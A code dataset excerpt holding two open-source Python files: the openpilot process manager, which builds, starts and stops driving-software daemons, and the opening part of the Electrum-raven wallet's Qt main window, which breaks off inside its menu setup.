source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict, List
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.swaglog import cloudlog, add_logentries_handler
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Run scons
spinner = Spinner()
spinner.update("0")
if __name__ != "__main__":
spinner.close()
def build():
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if PREBUILT else 30.0
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update(str(int(perc)))
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import *
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import Multisig_Wallet, CannotBumpFee, Abstract_Wallet
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418; try to at least show popup:
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_list.update_item(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
# update(==init) all tabs; expensive for large wallets..
# so delay it somewhat, hence __init__ can finish and the window can appear sooner
QTimer.singleShot(50, self.update_tabs)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-raven Testnet" if constants.net.TESTNET else "Electrum-raven"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
